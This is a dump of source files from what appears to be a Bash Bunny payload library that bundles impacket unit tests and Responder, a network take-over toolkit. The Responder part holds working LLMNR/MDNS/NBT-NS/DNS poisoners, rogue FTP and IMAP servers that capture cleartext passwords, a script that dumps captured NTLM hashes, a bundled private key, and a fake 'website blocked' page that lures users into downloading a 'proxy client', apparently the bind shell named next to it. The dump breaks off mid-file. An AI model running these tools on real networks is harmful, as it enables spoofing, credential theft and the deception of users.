self.frame_orig='\xb4\x00\x81\x01\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x99\x75\x43\x73' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | 
self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND) 27 | 28 | self.rts = Dot11ControlFrameRTS(d.get_body_as_string()) 29 | 30 | d.contains(self.rts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.rts.get_header_size(), 14) 35 | self.assertEqual(self.rts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.rts.get_duration(), 0x181) 41 | self.rts.set_duration(0x1234) 42 | self.assertEqual(self.rts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.rts.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.rts.set_ra(ra) 52 | self.assertEqual(self.rts.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.rts.get_ta() 58 | self.assertEqual(ta.tolist(), [0x00,0x23,0x4d,0x09,0x86,0xfe]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.rts.set_ta(ta) 62 | self.assertEqual(self.rts.get_ta().tolist(), [0x12,0x23,0x4d,0x09,0x86,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlRTS) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information. 
8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for helper used to build ProtocolPackets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | # sorry, this is very ugly, but I'm in python 2.5 18 | import sys 19 | sys.path.insert(0,"../../..") 20 | 21 | 22 | import unittest 23 | import impacket.helper as h 24 | 25 | 26 | 27 | class TestHelpers(unittest.TestCase): 28 | 29 | def test_well_formed(self): 30 | class MockPacket(h.ProtocolPacket): 31 | byte_field = h.Byte(0) 32 | word_field = h.Word(1, ">") 33 | three_bytes_field = h.ThreeBytesBigEndian(3) 34 | long_field = h.Long(6, ">") 35 | aliased_bit_field = h.Bit(0,0) 36 | 37 | header_size = 4 38 | tail_size = 0 39 | 40 | p = MockPacket() 41 | p.byte_field = 1 42 | p.word_field = 2 43 | p.three_bytes_field = 4 44 | p.long_field = 8 45 | 46 | self.assertEqual(1, p.byte_field) 47 | self.assertEqual(2, p.word_field) 48 | self.assertEqual(4, p.three_bytes_field) 49 | self.assertEqual(8, p.long_field) 50 | 51 | self.assertEqual(True, p.aliased_bit_field) 52 | 53 | p.aliased_bit_field = False 54 | 55 | self.assertEqual(0, p.byte_field) 56 | 57 | self.assertEqual(p.get_packet(), MockPacket(p.get_packet()).get_packet()) # it is the same packet after reprocessing. 58 | 59 | 60 | suite = unittest.TestLoader().loadTestsFromTestCase(TestHelpers) 61 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_wps.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information. 
8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for WPS packets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | 18 | # sorry, this is very ugly, but I'm in python 2.5 19 | import sys 20 | sys.path.insert(0,"../../..") 21 | 22 | 23 | import unittest 24 | from impacket import wps 25 | import array 26 | 27 | 28 | class TestTLVContainer(unittest.TestCase): 29 | 30 | def testNormalUsageContainer(self): 31 | BUILDERS={ 32 | 1: wps.StringBuilder(), 33 | 2: wps.ByteBuilder(), 34 | 3: wps.NumBuilder(2) 35 | } 36 | tlvc = wps.TLVContainer(builders=BUILDERS) 37 | 38 | KINDS_N_VALUES = ( 39 | (1, "Sarlanga"), 40 | (2, 1), 41 | (3, 1024), 42 | (4, array.array("B", [1,2,3])) 43 | ) 44 | for k,v in KINDS_N_VALUES: 45 | tlvc.append(k,v) 46 | 47 | tlvc2 = wps.TLVContainer(builders=BUILDERS) 48 | tlvc2.from_ary(tlvc.to_ary()) 49 | 50 | for k,v in KINDS_N_VALUES: 51 | self.assertEqual(v, tlvc2.first(k)) 52 | 53 | self.assertEqual(tlvc.to_ary(), tlvc2.to_ary()) 54 | self.assertEquals("Sarlanga", tlvc.first(1)) 55 | 56 | suite = unittest.TestLoader().loadTestsFromTestCase(TestTLVContainer) 57 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/uuid.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # Generate UUID compliant with http://www.webdav.org/specs/draft-leach-uuids-guids-01.txt. 9 | # A different, much simpler (not necessarily better) algorithm is used. 
10 | # 11 | # Author: 12 | # Javier Kohen (jkohen) 13 | # 14 | 15 | import re 16 | 17 | from random import randrange 18 | from struct import pack, unpack 19 | 20 | def generate(): 21 | # UHm... crappy Python has an maximum integer of 2**31-1. 22 | top = (1L<<31)-1 23 | return pack("IIII", randrange(top), randrange(top), randrange(top), randrange(top)) 24 | 25 | def bin_to_string(uuid): 26 | uuid1, uuid2, uuid3 = unpack('HHL', uuid[8:16]) 28 | return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) 29 | 30 | def string_to_bin(uuid): 31 | matches = re.match('([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})', uuid) 32 | (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = map(lambda x: long(x, 16), matches.groups()) 33 | uuid = pack('HHL', uuid4, uuid5, uuid6) 35 | return uuid 36 | 37 | def stringver_to_bin(s): 38 | (maj,min) = s.split('.') 39 | return pack('=2.6)', 'pyasn1 (>=0.1.8)'], 29 | ) 30 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/.gitignore: -------------------------------------------------------------------------------- 1 | # Responder logs 2 | *.db 3 | *.txt 4 | *.log 5 | 6 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/DumpHash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 
9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import sqlite3 18 | 19 | def DumpHashToFile(outfile, data): 20 | with open(outfile,"w") as dump: 21 | dump.write(data) 22 | 23 | def DbConnect(): 24 | cursor = sqlite3.connect("./Responder.db") 25 | return cursor 26 | 27 | def GetResponderCompleteNTLMv2Hash(cursor): 28 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 29 | Output = "" 30 | for row in res.fetchall(): 31 | Output += '{0}'.format(row[0])+'\n' 32 | return Output 33 | 34 | def GetResponderCompleteNTLMv1Hash(cursor): 35 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 36 | Output = "" 37 | for row in res.fetchall(): 38 | Output += '{0}'.format(row[0])+'\n' 39 | return Output 40 | 41 | cursor = DbConnect() 42 | print "Dumping NTLMV2 hashes:" 43 | v2 = GetResponderCompleteNTLMv2Hash(cursor) 44 | DumpHashToFile("DumpNTLMv2.txt", v2) 45 | print v2 46 | print "\nDumping NTLMv1 hashes:" 47 | v1 = GetResponderCompleteNTLMv1Hash(cursor) 48 | DumpHashToFile("DumpNTLMv1.txt", v1) 49 | print v1 50 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/gen-self-signed-cert.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | openssl genrsa -out responder.key 2048 3 | openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/" 4 | 
-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw 3 | NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC 4 | AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 5 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 6 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 7 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 8 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 9 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU 10 | YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm 11 | 6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0 12 | YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8 13 | koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335 14 | 4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw 15 | YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW 16 | HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v 17 | u0/CRCN/lg== 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 3 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 4 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 5 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 6 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 7 
| N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS 8 | 1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY 9 | kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U 10 | YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R 11 | FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i 12 | erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ 13 | IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS 14 | nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL 15 | LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9 16 | cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1 17 | 5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf 18 | s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje 19 | ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2 20 | VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes 21 | AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35 22 | HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf 23 | VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm 24 | kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35 25 | f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp 26 | MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/AccessDenied.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Website Blocked: ISA Proxy Server 4 | 14 | 15 | 16 | 17 |
18 |
19 |
New Security Policy: Website Blocked
20 |
    21 |
    22 |
    23 |
  • Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
  • 24 |
    25 |
26 |
27 | 28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/fingerprint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 
17 | import socket 18 | import struct 19 | 20 | from utils import color 21 | from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData 22 | 23 | def OsNameClientVersion(data): 24 | try: 25 | length = struct.unpack('i", len(''.join(Packet)))+Packet 44 | s.send(Buffer) 45 | data = s.recv(2048) 46 | 47 | if data[8:10] == "\x72\x00": 48 | Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00") 49 | Body = SMBSessionFingerData() 50 | Body.calculate() 51 | 52 | Packet = str(Header)+str(Body) 53 | Buffer = struct.pack(">i", len(''.join(Packet)))+Packet 54 | 55 | s.send(Buffer) 56 | data = s.recv(2048) 57 | 58 | if data[8:10] == "\x73\x16": 59 | return OsNameClientVersion(data) 60 | except: 61 | print color("[!] ", 1, 1) +" Fingerprint failed" 62 | return None 63 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/logs/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/logs/.gitignore -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/MDNS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 
9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import struct 18 | 19 | from SocketServer import BaseRequestHandler 20 | from packets import MDNS_Ans 21 | from utils import * 22 | 23 | def Parse_MDNS_Name(data): 24 | try: 25 | data = data[12:] 26 | NameLen = struct.unpack('>B',data[0])[0] 27 | Name = data[1:1+NameLen] 28 | NameLen_ = struct.unpack('>B',data[1+NameLen])[0] 29 | Name_ = data[1+NameLen:1+NameLen+NameLen_+1] 30 | return Name+'.'+Name_ 31 | except IndexError: 32 | return None 33 | 34 | 35 | def Poisoned_MDNS_Name(data): 36 | data = data[12:] 37 | return data[:len(data)-5] 38 | 39 | class MDNS(BaseRequestHandler): 40 | def handle(self): 41 | MADDR = "224.0.0.251" 42 | MPORT = 5353 43 | 44 | data, soc = self.request 45 | Request_Name = Parse_MDNS_Name(data) 46 | 47 | # Break out if we don't want to respond to this host 48 | if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True): 49 | return None 50 | 51 | if settings.Config.AnalyzeMode: # Analyze Mode 52 | if Parse_IPV6_Addr(data): 53 | print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3))) 54 | SavePoisonersToDb({ 55 | 'Poisoner': 'MDNS', 56 | 'SentToIp': self.client_address[0], 57 | 'ForName': Request_Name, 58 | 'AnalyzeMode': '1', 59 | }) 60 | else: # Poisoning Mode 61 | if Parse_IPV6_Addr(data): 62 | 63 | Poisoned_Name = Poisoned_MDNS_Name(data) 64 | Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton()) 65 | Buffer.calculate() 66 | soc.sendto(str(Buffer), (MADDR, MPORT)) 67 | 68 | print color('[*] [MDNS] Poisoned answer sent to 
%-15s for name %s' % (self.client_address[0], Request_Name), 2, 1) 69 | SavePoisonersToDb({ 70 | 'Poisoner': 'MDNS', 71 | 'SentToIp': self.client_address[0], 72 | 'ForName': Request_Name, 73 | 'AnalyzeMode': '0', 74 | }) 75 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/NBTNS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import fingerprint 18 | 19 | from packets import NBT_Ans 20 | from SocketServer import BaseRequestHandler 21 | from utils import * 22 | 23 | # Define what are we answering to. 24 | def Validate_NBT_NS(data): 25 | if settings.Config.AnalyzeMode: 26 | return False 27 | elif NBT_NS_Role(data[43:46]) == "File Server": 28 | return True 29 | elif settings.Config.NBTNSDomain: 30 | if NBT_NS_Role(data[43:46]) == "Domain Controller": 31 | return True 32 | elif settings.Config.Wredirect: 33 | if NBT_NS_Role(data[43:46]) == "Workstation/Redirector": 34 | return True 35 | return False 36 | 37 | # NBT_NS Server class. 
38 | class NBTNS(BaseRequestHandler): 39 | 40 | def handle(self): 41 | 42 | data, socket = self.request 43 | Name = Decode_Name(data[13:45]) 44 | 45 | # Break out if we don't want to respond to this host 46 | if RespondToThisHost(self.client_address[0], Name) is not True: 47 | return None 48 | 49 | if data[2:4] == "\x01\x10": 50 | Finger = None 51 | if settings.Config.Finger_On_Off: 52 | Finger = fingerprint.RunSmbFinger((self.client_address[0],445)) 53 | 54 | if settings.Config.AnalyzeMode: # Analyze Mode 55 | LineHeader = "[Analyze mode: NBT-NS]" 56 | print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1) 57 | SavePoisonersToDb({ 58 | 'Poisoner': 'NBT-NS', 59 | 'SentToIp': self.client_address[0], 60 | 'ForName': Name, 61 | 'AnalyzeMode': '1', 62 | }) 63 | else: # Poisoning Mode 64 | Buffer = NBT_Ans() 65 | Buffer.calculate(data) 66 | socket.sendto(str(Buffer), self.client_address) 67 | LineHeader = "[*] [NBT-NS]" 68 | 69 | print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1) 70 | 71 | SavePoisonersToDb({ 72 | 'Poisoner': 'NBT-NS', 73 | 'SentToIp': self.client_address[0], 74 | 'ForName': Name, 75 | 'AnalyzeMode': '0', 76 | }) 77 | 78 | if Finger is not None: 79 | print text("[FINGER] OS Version : %s" % color(Finger[0], 3)) 80 | print text("[FINGER] Client Version : %s" % color(Finger[1], 3)) 81 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/poisoners/__init__.py -------------------------------------------------------------------------------- 
/payloads/library/tools_installer/tools_to_install/responder/servers/DNS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from packets import DNS_Ans 18 | from SocketServer import BaseRequestHandler 19 | from utils import * 20 | 21 | def ParseDNSType(data): 22 | QueryTypeClass = data[len(data)-4:] 23 | 24 | # If Type A, Class IN, then answer. 
25 | return QueryTypeClass == "\x00\x01\x00\x01" 26 | 27 | 28 | 29 | class DNS(BaseRequestHandler): 30 | def handle(self): 31 | # Break out if we don't want to respond to this host 32 | if RespondToThisIP(self.client_address[0]) is not True: 33 | return None 34 | 35 | try: 36 | data, soc = self.request 37 | 38 | if ParseDNSType(data) and settings.Config.AnalyzeMode == False: 39 | buff = DNS_Ans() 40 | buff.calculate(data) 41 | soc.sendto(str(buff), self.client_address) 42 | 43 | ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 44 | print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 45 | 46 | except Exception: 47 | pass 48 | 49 | # DNS Server TCP Class 50 | class DNSTCP(BaseRequestHandler): 51 | def handle(self): 52 | # Break out if we don't want to respond to this host 53 | if RespondToThisIP(self.client_address[0]) is not True: 54 | return None 55 | 56 | try: 57 | data = self.request.recv(1024) 58 | 59 | if ParseDNSType(data) and settings.Config.AnalyzeMode is False: 60 | buff = DNS_Ans() 61 | buff.calculate(data) 62 | self.request.send(str(buff)) 63 | 64 | ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 65 | print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 66 | 67 | except Exception: 68 | pass 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/FTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 
4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import FTPPacket 20 | 21 | class FTP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(FTPPacket())) 25 | data = self.request.recv(1024) 26 | 27 | if data[0:4] == "USER": 28 | User = data[5:].strip() 29 | 30 | Packet = FTPPacket(Code="331",Message="User name okay, need password.") 31 | self.request.send(str(Packet)) 32 | data = self.request.recv(1024) 33 | 34 | if data[0:4] == "PASS": 35 | Pass = data[5:].strip() 36 | 37 | Packet = FTPPacket(Code="530",Message="User not logged in.") 38 | self.request.send(str(Packet)) 39 | data = self.request.recv(1024) 40 | 41 | SaveToDb({ 42 | 'module': 'FTP', 43 | 'type': 'Cleartext', 44 | 'client': self.client_address[0], 45 | 'user': User, 46 | 'cleartext': Pass, 47 | 'fullhash': User + ':' + Pass 48 | }) 49 | 50 | else: 51 | Packet = FTPPacket(Code="502",Message="Command not implemented.") 52 | self.request.send(str(Packet)) 53 | data = self.request.recv(1024) 54 | 55 | except Exception: 56 | pass 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/IMAP.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd 20 | 21 | class IMAP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(IMAPGreeting())) 25 | data = self.request.recv(1024) 26 | 27 | if data[5:15] == "CAPABILITY": 28 | RequestTag = data[0:4] 29 | self.request.send(str(IMAPCapability())) 30 | self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag))) 31 | data = self.request.recv(1024) 32 | 33 | if data[5:10] == "LOGIN": 34 | Credentials = data[10:].strip() 35 | 36 | SaveToDb({ 37 | 'module': 'IMAP', 38 | 'type': 'Cleartext', 39 | 'client': self.client_address[0], 40 | 'user': Credentials[0], 41 | 'cleartext': Credentials[1], 42 | 'fullhash': 